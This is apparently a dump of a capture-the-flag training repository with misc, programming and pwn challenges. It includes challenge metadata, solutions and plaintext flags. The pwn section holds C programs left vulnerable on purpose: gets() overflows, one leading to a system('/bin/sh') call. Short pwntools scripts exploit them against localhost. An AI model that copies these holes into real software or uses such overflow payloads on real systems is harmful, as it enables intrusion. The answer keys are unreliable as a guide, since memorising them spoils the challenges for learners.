8 | https://whc.unesco.org/en/list/179/"-source: read it 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /misc/Alien/solution/README.md: -------------------------------------------------------------------------------- 1 | # Alien 2 | 3 | ## Write-up 4 | 5 | https://www.reddit.com/r/algeria/comments/hp592u/comment/ia2wtik/?utm_source=share&utm_medium=web2x&context=3 6 | 7 | ## Flag 8 | 9 | `shellmates{4lg3r1a_1$_B34t1fuL}` 10 | -------------------------------------------------------------------------------- /misc/Enigma/README.md: -------------------------------------------------------------------------------- 1 | # Enigma 2 | 3 | **`Author:`** [Elghazali](https://github.com/Elghazali-99) 4 | 5 | ## Description 6 | 7 | But before that, we should test you. 8 | Pass the intermediate gates to arrive at your destiny. 9 | link: https://t.me/shellmates_cicada_bot 10 | 11 | ## Solution 12 | 13 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /misc/Enigma/solution/README.md: -------------------------------------------------------------------------------- 1 | # Enigma 2 | 3 | ## Write-up 4 | ## Level 1: 5 | ![IMG](lock.png) 6 | 7 | - Lock code: ``13379E`` 8 | 9 | ## Level 2: 10 | ![IMG](blue.png) 11 | 12 | - There is Braille code on the door; decoding it gives the magic phrase: ``opensesame`` 13 | 14 | ## Level 3: 15 | ![IMG](morse.png) 16 | 17 | - This audio contains Morse code, which you can easily view using ``audacity``. 18 | There are also many online tools that do the job. 19 | Passphrase: ``TAUGH_TIME_NEVER_LAST``.
(i knw it should be Tough not Taugh XD) 20 | 21 | ## Level 4: 22 | ![IMG](etcetra.png) 23 | 24 | - by changing the levels using any photo editor: 25 | 26 | ![IMG](gimp.png) 27 | 28 | passphrase: ``S9LMB07`` 29 | 30 | 31 | ## Level 5: 32 | ![IMG](vig.png) 33 | 34 | - Vigenere cipher : ``open the drawer and listen to the cassette!`` 35 | 36 | ## Final level: 37 | 38 | - After reversing the audio at the first time you may hear ``30 cows in a field, 28 chickens how many didn't``, in fact it's ``30 cows in a field, 20 ate chicken how many didn't`` and obviously the answer is: ``10``. 39 | 40 | after solving all this challs the bot will bring you the flag. 41 | 42 | ![IMG](flag.png) 43 | ## Flag 44 | 45 | `shellmates{H4CK1N1_3N1GM4_W1NN3R_154826}` 46 | -------------------------------------------------------------------------------- /misc/Enigma/solution/blue.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/blue.png -------------------------------------------------------------------------------- /misc/Enigma/solution/etcetra.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/etcetra.png -------------------------------------------------------------------------------- /misc/Enigma/solution/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/flag.png -------------------------------------------------------------------------------- /misc/Enigma/solution/gimp.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/gimp.png -------------------------------------------------------------------------------- /misc/Enigma/solution/lock.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/lock.png -------------------------------------------------------------------------------- /misc/Enigma/solution/morse.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/morse.png -------------------------------------------------------------------------------- /misc/Enigma/solution/vig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/Enigma/solution/vig.png -------------------------------------------------------------------------------- /misc/README.md: -------------------------------------------------------------------------------- 1 | # Misc 2 | 3 | This directory contains challenges related to the `Misc` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /misc/hello_word/README.md: -------------------------------------------------------------------------------- 1 | # Hello word 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | Whats the structure of an MS word ?? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 
12 | -------------------------------------------------------------------------------- /misc/hello_word/presentation.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/misc/hello_word/presentation.docx -------------------------------------------------------------------------------- /misc/hello_word/solution/README.md: -------------------------------------------------------------------------------- 1 | # Hello word 2 | 3 | ## Write-up 4 | 5 | Word files, like most Office and LibreOffice files, are structured as ZIP archives. 6 | Unzip the file and find the flag in the setting.xml 7 | 8 | ## Flag 9 | 10 | `shellmates{w0RDS_aRE_JUst_S0M3_ZiP}` 11 | -------------------------------------------------------------------------------- /misc/imageData/README.md: -------------------------------------------------------------------------------- 1 | # Image Data 2 | 3 | **`Author:`** [Chih3b](https://github.com/Ch1h3b) 4 | 5 | ## Description 6 | 7 | You are so nice I'm giving you a canvas image data! 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /misc/imageData/solution/README.md: -------------------------------------------------------------------------------- 1 | # Image Data 2 | 3 | ## Write-up 4 | 5 | Create a JS canvas and parse the image data. 6 | Read about it [here](https://developer.mozilla.org/en-US/docs/Web/API/Canvas_API/Tutorial) 7 | 8 | ## Flag 9 | 10 | `shellmates{canv4s-J$_Is_$o_fuN}` 11 | -------------------------------------------------------------------------------- /programming/README.md: -------------------------------------------------------------------------------- 1 | # Programming 2 | 3 | This directory contains challenges related to the `Programming` category.
Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /programming/RPS/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | RUN pip3 install termcolor 8 | 9 | COPY challenge /challenge/ 10 | 11 | WORKDIR /challenge 12 | 13 | RUN chmod +x challenge.py entrypoint.sh 14 | 15 | ENTRYPOINT ["./entrypoint.sh"] 16 | -------------------------------------------------------------------------------- /programming/RPS/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="python3 ./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /programming/RPS/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 
6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /programming/chess.INI/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | RUN pip3 install termcolor 8 | 9 | COPY challenge /challenge/ 10 | 11 | WORKDIR /challenge 12 | 13 | RUN chmod +x challenge.py entrypoint.sh 14 | 15 | ENTRYPOINT ["./entrypoint.sh"] 16 | -------------------------------------------------------------------------------- /programming/chess.INI/README.md: -------------------------------------------------------------------------------- 1 | # chess.INI 2 | 3 | ## Write-up 4 | - Did you heard about chess!!! sure you did. 5 | - Your mission now is to find the length of path that the king (K) takes to reach the target (T). 6 | - the pawns (p) are like obstacles that the king can't pass. 7 | - learn more about king's moves here : https://en.wikipedia.org/wiki/King_(chess) 8 | ## Flag 9 | 10 | `shellmates{ch355_M4k35_M3n_w153r_4nd_CL34R-519H73D}` -------------------------------------------------------------------------------- /programming/chess.INI/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "chess.INI" 2 | author: "yh_0x7" 3 | author_link: "github.com/yh-0x7" 4 | category: programming 5 | difficulty: medhard 6 | 7 | description: | 8 | > Did you heard about chess!!! sure you did. 9 | > Your mission now is to find the length of path that the king (K) takes to reach the target (T). 10 | > the pawns (p) are like obstacles that the king can't pass. 
11 | > learn more about king's moves here : https://en.wikipedia.org/wiki/King_(chess) 12 | 13 | **Author** : yh_0x7 14 | flags: 15 | - shellmates{ch355_M4k35_M3n_w153r_4nd_CL34R-519H73D} 16 | 17 | topics: 18 | - scripting 19 | - programming 20 | - chess 21 | 22 | tags: 23 | - programming 24 | - scripting 25 | - medium/hard 26 | 27 | value: 500 28 | type: dynamic 29 | extra: 30 | initial: 500 31 | decay: 15 32 | minimum: 50 33 | state: visible 34 | version: "0.1" 35 | -------------------------------------------------------------------------------- /programming/chess.INI/challenge/.passwd: -------------------------------------------------------------------------------- 1 | shellmates{ch355_M4k35_M3n_w153r_4nd_CL34R-519H73D} -------------------------------------------------------------------------------- /programming/chess.INI/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /programming/chess.INI/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 
6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /programming/zero-to-hero/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x entrypoint.sh 13 | 14 | ENTRYPOINT ["./entrypoint.sh"] 15 | -------------------------------------------------------------------------------- /programming/zero-to-hero/README.md: -------------------------------------------------------------------------------- 1 | # from zero to hero 2 | 3 | **`Author:`** [ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > Start your journey and be the one who learns them all. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /programming/zero-to-hero/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "from zero to hero" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | category: programming 5 | 6 | difficulty: medium 7 | description: | 8 | > Start your journey and be the one who learns them all. 
9 | 10 | **Author** : Ouxs 11 | 12 | connection_info: ncat -v --ssl zero-to-hero.challs.shellmates.club 443 13 | 14 | 15 | flags: 16 | - shellmates{T0POLOGICAL_$0RTING_FTW____!!!} 17 | 18 | tags: 19 | - medium 20 | 21 | value: 500 22 | type: dynamic 23 | extra: 24 | initial: 500 25 | decay: 15 26 | minimum: 50 27 | 28 | state: visible 29 | version: "0.1" 30 | -------------------------------------------------------------------------------- /programming/zero-to-hero/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./chall.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /programming/zero-to-hero/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.8" 2 | 3 | services: 4 | server: 5 | build: . 
6 | ports: 7 | - "1337:1337" 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 20 | -------------------------------------------------------------------------------- /programming/zero-to-hero/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | # 1 - Build graph skill --> (skills needed) 5 | # 2 - Direct application of topological sorting 6 | 7 | import graphlib 8 | from pwn import * 9 | 10 | begin, l = 9, 10 11 | host, port = "zero-to-hero.challs.shellmates.club", 443 12 | 13 | def make_graph(r): 14 | dpnds = {} 15 | for line in r : 16 | skill, skills = line.split(":") 17 | skill = skill[begin:begin+l] 18 | skills = skills.strip() 19 | if skills : 20 | skills = skills.split("-") 21 | else : 22 | skills = [] 23 | dpnds[skill] = skills 24 | return dpnds 25 | 26 | def main(): 27 | p = remote(host, port, ssl=True) 28 | p.recvuntil("randomly\n\n") 29 | for i in range(90): 30 | r = p.recvuntil('\nPath -> ',drop=True).decode().split("\n") 31 | g = make_graph(r) 32 | try : 33 | result = "-".join(graphlib.TopologicalSorter(g).static_order()) 34 | except graphlib.CycleError : 35 | result = "impossible" 36 | p.sendline(result) 37 | p.interactive() 38 | 39 | if __name__ == '__main__': 40 | main() -------------------------------------------------------------------------------- /pwn/B0F0/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt-get update && apt-get install socat -y && apt-get install gcc-multilib -y 4 | 5 | COPY challenge /challenge 6 | 7 | WORKDIR /challenge 8 | 9 | RUN chmod +x entrypoint.sh challenge && \ 10 | chown -R root:root . 
11 | 12 | EXPOSE 1337 13 | 14 | ENTRYPOINT ["/challenge/entrypoint.sh"] -------------------------------------------------------------------------------- /pwn/B0F0/README.md: -------------------------------------------------------------------------------- 1 | # B0F0 2 | 3 | **`Author:`** [1m4D](https://github.com/imadbourouche) 4 | 5 | ## Description 6 | > I can't change my date, can you ? 7 | 8 | ### Connect with : nc localhost 1337 9 | 10 | ### [challenge.c](src/chellenge.c) 11 | 12 | 13 | ## Solution 14 | Solution of the challenge can be found [here](solution/). 15 | -------------------------------------------------------------------------------- /pwn/B0F0/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "B0F0" 2 | author: "1m4D" 3 | author_link: "https://github.com/imadbourouche" 4 | 5 | category: pwn 6 | 7 | difficulty: easy 8 | 9 | description: | 10 | > I can't change my date, can you ? 11 | 12 | **Author** : 1m4D 13 | 14 | flags: 15 | - shellamtes{Y0u_H4vE_ChE4ngED_mY_V4R14Ble_98765} 16 | 17 | connection_info: ncat -v --ssl bof0.challs.shellmates.club 443 18 | 19 | files: 20 | - ./src/challenge.c 21 | - ./challenge/challenge 22 | 23 | tags: 24 | - easy 25 | 26 | value: 500 27 | 28 | type: dynamic 29 | 30 | extra: 31 | initial: 500 32 | decay: 15 33 | minimum: 50 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /pwn/B0F0/challenge/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/B0F0/challenge/challenge -------------------------------------------------------------------------------- /pwn/B0F0/challenge/challenge.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | //gcc -m32 -no-pie 
-fno-stack-protector challenge.c -o challenge 7 | 8 | int main(){ 9 | setbuf(stdin, NULL); 10 | setbuf(stdout, NULL); 11 | setbuf(stderr, NULL); 12 | 13 | int date=2852022; 14 | char name[128]; 15 | 16 | printf("Give me your name: "); 17 | gets(name); 18 | 19 | printf("Date = %d\n",date); 20 | if(date == 2752022){ 21 | printf("You win\n"); 22 | system("/bin/cat flag"); 23 | }else{ 24 | printf("You are not allowed\n"); 25 | } 26 | return 0; 27 | } -------------------------------------------------------------------------------- /pwn/B0F0/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./challenge" 4 | socat -d -T60 tcp-l:1337,reuseaddr,fork,keepalive,su=nobody exec:$EXEC,stderr 5 | -------------------------------------------------------------------------------- /pwn/B0F0/challenge/flag: -------------------------------------------------------------------------------- 1 | shellamtes{Y0u_H4vE_ChE4ngED_mY_V4R14Ble_98765} 2 | -------------------------------------------------------------------------------- /pwn/B0F0/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | server: 5 | build: . 
6 | ports: 7 | - '1502:1337' 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 -------------------------------------------------------------------------------- /pwn/B0F0/solution/script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | from pwn import * 5 | 6 | 7 | p=b'a'*128 8 | 9 | #conn = process("../challenge/challenge") 10 | conn=remote("127.0.0.1",1337) 11 | 12 | conn.sendline(p+struct.pack('I', 0x29FE16)) 13 | print(conn.recvall()) 14 | -------------------------------------------------------------------------------- /pwn/B0F0/src/challenge.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | //gcc -m32 -no-pie -fno-stack-protector challenge.c -o challenge 7 | 8 | int main(){ 9 | int date=2852022; 10 | char name[128]; 11 | 12 | setbuf(stdin, NULL); 13 | setbuf(stdout, NULL); 14 | setbuf(stderr, NULL); 15 | 16 | printf("Give me your name: "); 17 | gets(name); 18 | printf("date = %d\n",date); 19 | if(date == 2752022){ 20 | printf("You win\n"); 21 | system("/bin/cat flag"); 22 | }else{ 23 | printf("You are not allowed\n"); 24 | } 25 | return 0; 26 | } 27 | -------------------------------------------------------------------------------- /pwn/B0F1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:latest 2 | 3 | RUN apt-get update && apt-get install socat -y && apt-get install gcc-multilib -y 4 | 5 | COPY challenge /challenge 6 | 7 | WORKDIR /challenge 8 | 9 | RUN chmod +x entrypoint.sh challenge && \ 10 | chown -R root:root . 
11 | 12 | EXPOSE 1337 13 | 14 | ENTRYPOINT ["/challenge/entrypoint.sh"] -------------------------------------------------------------------------------- /pwn/B0F1/README.md: -------------------------------------------------------------------------------- 1 | # B0F1 2 | 3 | **`Author:`** [1m4D](https://github.com/imadbourouche) 4 | 5 | ## Description 6 | > Open a shell and get your flag :D 7 | 8 | ### Connect with : nc localhost 1337 9 | 10 | ### [challenge.c](src/chellenge.c) 11 | 12 | 13 | ## Solution 14 | Solution of the challenge can be found [here](solution/). 15 | -------------------------------------------------------------------------------- /pwn/B0F1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "B0F1" 2 | author: "1m4D" 3 | author_link: "https://github.com/imadbourouche" 4 | 5 | category: pwn 6 | 7 | difficulty: ezmed 8 | 9 | description: | 10 | > Open a shell and get your flag :D 11 | 12 | **Author** : 1m4D 13 | 14 | flags: 15 | - shellamtes{Y0u_4lS0_GET_A_$HEll_65431} 16 | 17 | connection_info: ncat -v --ssl bof1.challs.shellmates.club 443 18 | 19 | files: 20 | - ./src/challenge.c 21 | - ./challenge/challenge 22 | 23 | tags: 24 | - easy/medium 25 | 26 | value: 500 27 | 28 | type: dynamic 29 | 30 | extra: 31 | initial: 500 32 | decay: 15 33 | minimum: 50 34 | 35 | state: visible 36 | 37 | version: "0.1" 38 | -------------------------------------------------------------------------------- /pwn/B0F1/challenge/challenge: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/B0F1/challenge/challenge -------------------------------------------------------------------------------- /pwn/B0F1/challenge/challenge.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | //gcc -m32 -no-pie 
-fno-stack-protector challenge.c -o challenge 7 | 8 | void open_shell(int password){ 9 | if (password==1337){ 10 | printf("good job you get a shell :)\n"); 11 | system("/bin/sh"); 12 | exit(0); 13 | }else{ 14 | printf("password incorrect\n"); 15 | exit(0); 16 | } 17 | } 18 | 19 | void say_my_name(){ 20 | char name[20]; 21 | printf("Give me your name: "); 22 | gets(name); 23 | printf("Hello %s\n",name); 24 | } 25 | 26 | 27 | int main(){ 28 | setbuf(stdin, NULL); 29 | setbuf(stdout, NULL); 30 | setbuf(stderr, NULL); 31 | 32 | 33 | say_my_name(); 34 | return 0; 35 | } -------------------------------------------------------------------------------- /pwn/B0F1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./challenge" 4 | socat -d -T60 tcp-l:1337,reuseaddr,fork,keepalive,su=nobody exec:$EXEC,stderr 5 | -------------------------------------------------------------------------------- /pwn/B0F1/challenge/flag: -------------------------------------------------------------------------------- 1 | shellamtes{Y0u_4lS0_GET_A_$HEll_65431} -------------------------------------------------------------------------------- /pwn/B0F1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | server: 5 | build: . 
6 | ports: 7 | - '1503:1337' 8 | deploy: 9 | replicas: 1 10 | restart_policy: 11 | condition: on-failure 12 | resources: 13 | limits: 14 | memory: 50M 15 | healthcheck: 16 | test: socat - TCP4:localhost:1337 || exit 1 17 | interval: 60s 18 | timeout: 2s 19 | retries: 5 -------------------------------------------------------------------------------- /pwn/B0F1/solution/script.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | from pwn import * 5 | 6 | 7 | win_addr=0x080491c6 8 | p=b"a"*32 9 | 10 | #conn = process("./challenge") 11 | conn=remote("127.0.0.1",1337) 12 | conn.sendline(p+struct.pack('I', win_addr)+b'r'*4+struct.pack('I', 1337)) 13 | #print(conn.recv()) 14 | conn.interactive() -------------------------------------------------------------------------------- /pwn/B0F1/src/challenge.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | //gcc -m32 -no-pie -fno-stack-protector challenge.c -o challenge 7 | 8 | void open_shell(int password){ 9 | if (password==1337){ 10 | printf("good job you get a shell :)\n"); 11 | system("/bin/sh"); 12 | exit(0); 13 | }else{ 14 | printf("password incorrect\n"); 15 | exit(0); 16 | } 17 | } 18 | 19 | void say_my_name(){ 20 | char name[20]; 21 | printf("Give me your name: \n"); 22 | gets(name); 23 | printf("Hello %s\n",name); 24 | } 25 | 26 | 27 | int main(){ 28 | setbuf(stdin, NULL); 29 | setbuf(stdout, NULL); 30 | setbuf(stderr, NULL); 31 | 32 | say_my_name(); 33 | return 0; 34 | } 35 | -------------------------------------------------------------------------------- /pwn/README.md: -------------------------------------------------------------------------------- 1 | # Pwn 2 | 3 | This directory contains challenges related to the `Pwn` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 
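The B0F0 and B0F1 sources listed above read the name with `gets()` into a fixed-size stack buffer and are built with `-fno-stack-protector`. The following is an added example, not code from the challenge repository, showing a bounded replacement for that read; `struct frame`, `read_name()`, `run_demo()` and the input bytes are assumptions constructed for illustration.

```c
/* Added example (not from the challenge repository): a bounded replacement
 * for the gets(name) call in B0F0/B0F1. */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 128   /* same size as name[] in B0F0 */

enum read_status { READ_OK = 0, READ_TRUNCATED = 1, READ_EOF = -1 };

/* Assumed layout, for illustration only: a value that must not change sits
 * right after the buffer. The real stack layout is chosen by the compiler. */
struct frame {
    char name[NAME_LEN];
    int  date;
};

/* Read one line into dst, never writing more than dst_len bytes.
 * Bytes that do not fit are discarded up to the newline, so they are not
 * mistaken for the next line of input. */
enum read_status read_name(FILE *in, char *dst, size_t dst_len)
{
    size_t n;
    int c, dropped = 0;

    if (dst_len == 0)
        return READ_EOF;
    if (fgets(dst, (int)dst_len, in) == NULL) {
        dst[0] = '\0';
        return READ_EOF;
    }
    n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';              /* the whole line fitted */
        return READ_OK;
    }
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped = 1;                    /* line was longer than the buffer */
    return dropped ? READ_TRUNCATED : READ_OK;
}

struct outcome {
    enum read_status first;   /* status of the first read */
    size_t first_len;         /* bytes kept from the first line */
    int date;                 /* value of date after the read */
    char second[NAME_LEN];    /* what the next read returns */
};

/* Runs the B0F0 flow over constructed input held in a temporary file. */
int run_demo(const char *input, size_t len, struct outcome *out)
{
    struct frame f;
    FILE *in = tmpfile();

    if (in == NULL)
        return -1;
    if (fwrite(input, 1, len, in) != len) {
        fclose(in);
        return -1;
    }
    rewind(in);

    f.date = 2852022;                   /* initial value used in B0F0 */
    out->first = read_name(in, f.name, sizeof f.name);
    out->first_len = strlen(f.name);
    out->date = f.date;
    read_name(in, out->second, sizeof out->second);
    fclose(in);
    return 0;
}

int main(void)
{
    char input[256];
    struct outcome o;

    /* Constructed input: a 200-byte line followed by a normal line. */
    memset(input, 'a', 200);
    memcpy(input + 200, "\nsecond\n", 8);
    if (run_demo(input, 208, &o) != 0)
        return 1;
    printf("status=%d kept=%zu date=%d next=\"%s\"\n",
           (int)o.first, o.first_len, o.date, o.second);
    return 0;
}
```

A production build would also drop the `-fno-stack-protector` and `-no-pie` flags that the challenge's build comment uses.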
4 | -------------------------------------------------------------------------------- /pwn/no-way-out/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:18.04 2 | 3 | RUN apt-get update && \ 4 | apt-get install -y socat && \ 5 | rm -rf /var/lib/apt/lists/* 6 | 7 | RUN useradd ctf && \ 8 | mkdir /challenge 9 | 10 | COPY challenge /challenge 11 | 12 | WORKDIR /challenge 13 | 14 | RUN chmod +x entrypoint.sh no-way-out && \ 15 | chown -R root:root . 16 | 17 | USER ctf 18 | 19 | EXPOSE 1337 20 | 21 | ENTRYPOINT ["./entrypoint.sh"] 22 | -------------------------------------------------------------------------------- /pwn/no-way-out/README.md: -------------------------------------------------------------------------------- 1 | # No Way Out 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Can you escape this nightmare? 8 | 9 | **Connect with**: `ncat -v --ssl no-way-out.challs.shellmates.club 443` 10 | 11 | [no-way-out](challenge/no-way-out) 12 | [libc-2.27.so](dist/libc-2.27.so) 13 | [ld-2.27.so](dist/ld-2.27.so) 14 | 15 | ## Solution 16 | 17 | Solution of the challenge can be found [here](solution/). 18 | 19 | -------------------------------------------------------------------------------- /pwn/no-way-out/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "No Way Out" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: pwn 6 | difficulty: medhard 7 | 8 | description: | 9 | > Can you escape this nightmare? 
10 | 11 | **Author**: chenx3n 12 | 13 | connection_info: ncat -v --ssl no-way-out.challs.shellmates.club 443 14 | 15 | image: gcr.io/glowing-reserve-336013/no-way-out 16 | 17 | value: 500 18 | type: dynamic 19 | 20 | extra: 21 | initial: 500 22 | decay: 15 23 | minimum: 50 24 | 25 | flags: 26 | - shellmates{0verwRITInG_FuTuRE_R3turn_aDdrEs$_l1ke_a_BOS$} 27 | 28 | files: 29 | - ./challenge/no-way-out 30 | - ./lib/libc-2.27.so 31 | - ./lib/ld-2.27.so 32 | 33 | tags: 34 | - medium/hard 35 | 36 | state: visible 37 | 38 | version: "0.1" 39 | -------------------------------------------------------------------------------- /pwn/no-way-out/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | EXEC="./no-way-out" 4 | PORT=1337 5 | 6 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr 7 | -------------------------------------------------------------------------------- /pwn/no-way-out/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{0verwRITInG_FuTuRE_R3turn_aDdrEs$_l1ke_a_BOS$} 2 | -------------------------------------------------------------------------------- /pwn/no-way-out/challenge/no-way-out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/no-way-out/challenge/no-way-out -------------------------------------------------------------------------------- /pwn/no-way-out/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 
7 |     ports:
8 |       - '1501:1337'
9 |     deploy:
10 |       replicas: 1
11 |       restart_policy:
12 |         condition: on-failure
13 |       resources:
14 |         limits:
15 |           memory: 50M
16 |     healthcheck:
17 |       test: socat - TCP4:localhost:1337 || exit 1
18 |       interval: 60s
19 |       timeout: 2s
20 |       retries: 5
21 |
--------------------------------------------------------------------------------
/pwn/no-way-out/lib/ld-2.27.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/no-way-out/lib/ld-2.27.so
--------------------------------------------------------------------------------
/pwn/no-way-out/lib/libc-2.27.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/pwn/no-way-out/lib/libc-2.27.so
--------------------------------------------------------------------------------
/pwn/no-way-out/solution/README.md:
--------------------------------------------------------------------------------
1 | # No Way Out
2 |
